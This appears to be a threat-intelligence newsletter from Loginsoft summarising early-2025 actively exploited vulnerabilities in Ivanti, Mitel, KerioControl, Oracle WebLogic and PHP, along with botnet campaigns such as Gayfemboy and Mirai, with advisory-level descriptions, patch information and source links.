A robust start to 2025 as CISA updates its KEV catalog with four critical vulnerabilities. Two vulnerabilities impact Mitel products, one targets Oracle systems, and another exposes a zero-day flaw in Ivanti. Additionally, active exploitation of a critical weakness in KerioControl firewalls highlights the urgent need for organizations to prioritize patching and strengthen defenses against rapidly evolving threats.

Botnet activity continues to rise, with emerging threats like Zerobot exploiting vulnerabilities in Tenda Wi-Fi routers and Andoryu targeting GitLab. IoT-specific botnets such as IoT Reaper and AndroxGh0St persist in attacking Cisco routers and PHP Unit, while legacy botnets like Mirai and Tsunami continue exploiting an eight-year-old flaw in the Eir D1000 modem, underscoring the dangers posed by outdated and unsupported infrastructure.

In addition, Mandiant's investigation revealed the deployment of the SPAWN malware ecosystem across Ivanti Connect Secure appliances. Additionally, the Gayfemboy botnet, exploiting a zero-day in Four-Faith routers, has grown into a 15,000-node network, amplifying its DDoS capabilities by targeting other vulnerabilities and weak Telnet credentials. Furthermore, a PHP vulnerability has been leveraged to inject the PacketCrypt Classic cryptocurrency miner.

Current trending vulnerabilities offer insights into the latest emerging and widely discussed threats, helping to make informed decisions.  

CVE-2025-0282

A critical stack-based buffer overflow vulnerability in Ivanti Connect Secure allows remote unauthenticated attackers to execute arbitrary code. Affected versions include Ivanti Connect Secure prior to 22.7R2.5, Policy Secure prior to 22.7R1.2, and Neurons for ZTA Gateways prior to 22.7R2.3. Ivanti confirmed limited exploitation of Connect Secure appliances as a zero-day (CVE-2025-0282), while no exploitation has been observed in Policy Secure or ZTA Gateways.  Recognizing the critical nature of this issue, Cybersecurity and Infrastructure Security Agency (CISA) has added it to its Known Exploited Vulnerabilities (KEV) catalog, urging organizations to prioritize mitigation efforts.

‍CVE-2024-55550

A path traversal vulnerability has been identified in Mitel MiCollab, a unified communications solution that integrates chat, voice, video, and SMS messaging with Microsoft Teams. This flaw allows attackers with administrative privileges to read local files on the MiCollab server, potentially exposing sensitive information. The vulnerability affects versions 9.8 SP1 FP2 (9.8.1.201) and earlier, emphasizing the importance of timely updates. The flaw has been added to the CISA KEV catalog, urging immediate patching.

‍CVE-2024-41713

A path traversal vulnerability has been discovered in the NuPoint Unified Messaging (NPM) component of Mitel MiCollab, stemming from insufficient input validation. This vulnerability affects versions 9.8 SP1 FP2 (9.8.1.201) and earlier, enabling attackers to exploit the system and potentially access unauthorized files. With proof-of-concept (POC) publicly available, this issue poses a significant security risk. Highlighting its critical nature, CISA has added the vulnerability to its Known Exploited Vulnerabilities (KEV) catalog.  

‍CVE-2024-52875

A 1-click remote code execution vulnerability in the web interface of GFI  KerioControl firewalls is being actively exploited by threat actors. Using specially crafted malicious URLs, attackers can compromise systems running versions 9.2.5 through 9.4.5. To address this critical flaw, GFI Software has released version 9.4.5 Patch 1. Censys data as of January 7 reveals 23,862 exposed KerioControl instances globally, with 17% geolocated in Iran, emphasizing the urgent need for immediate patching to mitigate this actively exploited threat.

‍CVE-2020-2883

A deserialization of untrusted data vulnerability in Oracle WebLogic Server allows attackers to execute remote code on affected systems. Rated as critical with a CVSS score of 9.8, this five-year-old flaw continues to pose a significant threat to one of the most widely used application servers. The availability of a proof-of-concept (POC) exploit underscores the urgency for remediation. Highlighting its exploitation potential, CISA has added this vulnerability to its Known Exploited Vulnerabilities (KEV) catalog.

Telemetry collected from Loginsoft sensors were analyzed and processed to derive insights on what is actively being exploited and actively being scanned.  As source of truth, source IPv4 addresses & payloads can be provided on need-to-know basis.

Identified vulnerabilities exploited by botnets, including recent CVEs logged in Misp. Presenting the top 5 CVEs with payloads suggestive of botnet activities, like utilizing wget with IP addresses.

We proactively monitor the vulnerabilities which are targeted by adversaries. Each vulnerability is humanly studied and mapped with Mitre ATT&CK tactics and techniques. Source of information is derived from our vulnerability intelligence platform collected and curated information from various sources such as Twitter, Telegram, OSINT groups, Blogs, Data leak Sites and more.    

CVE-2025-0282

Google-owned Mandiant has confirmed zero-day exploitation of CVE-2025-0282 starting mid-December 2024, targeting Ivanti Connect Secure appliances in multiple organizations. In one analyzed instance, the SPAWN malware ecosystem, comprising SPAWNANT, SPAWNMOLE and SPAWNSNAIL was identified. The activity is attributed to UNC5337, assessed as part of UNC5221 with moderate confidence. The attacks also introduced two previously undocumented malware strains, DRYHOOK and PHASEJAM, which remain unattributed to any known threat actor.  

CVE-2024-4577

A critical OS command injection vulnerability in PHP, was exploited to inject the PacketCrypt Classic cryptocurrency miner, as reported by the SANS Internet Storm Center. Discovered by Orange Tsai in June 2024, this vulnerability was later demonstrated in a proof of concept by Watchtwr Labs. Historically, this vulnerability has been leveraged by various threat actors, including Androxgh0st, Ghost RAT and the Tellyouthepass ransomware, marking its continued use in malicious cyber campaigns.

‍Gayfemboy Botnet: A sophisticated DDoS threat

XLab has issued a report on the Gayfemboy botnet, an emerging and formidable threat exploiting a zero-day vulnerability in Four-Faith industrial routers. Originally a small variant of the notorious Mirai malware, Gayfemboy has evolved into a large-scale botnet, with over 15,000 active nodes engaged in Distributed Denial-of-Service (DDoS) attacks. In addition to exploiting the zero-day, the botnet also takes advantage of other vulnerabilities and weak Telnet credentials, significantly enhancing its attack capabilities.

It refers to vulnerabilities discovered and potentially exploited before their official inclusion in the National Vulnerability Database. The LOVI Platform aggregates and distributes data from open sources and social media, currently tracking over 100 security alerts and planning to expand.

1. https://www.cisa.gov/news-events/alerts/2025/01/08/cisa-adds-one-vulnerability-kev-catalog
2. https://www.cisa.gov/news-events/alerts/2025/01/07/cisa-adds-three-known-exploited-vulnerabilities-catalog
3. https://cloud.google.com/blog/topics/threat-intelligence/ivanti-connect-secure-vpn-zero-day/  
4. https://blog.xlab.qianxin.com/gayfemboy-en/  
5. https://isc.sans.edu/diary/31564
6. https://social.cyware.com/news/zerobot-operators-expand-attack-scope-with-new-exploits-and-ddos-methods-61301c69  
7. https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-016a  
8. https://blog.apnic.net/2021/12/23/preparing-for-the-next-large-scale-iot-botnet-attack/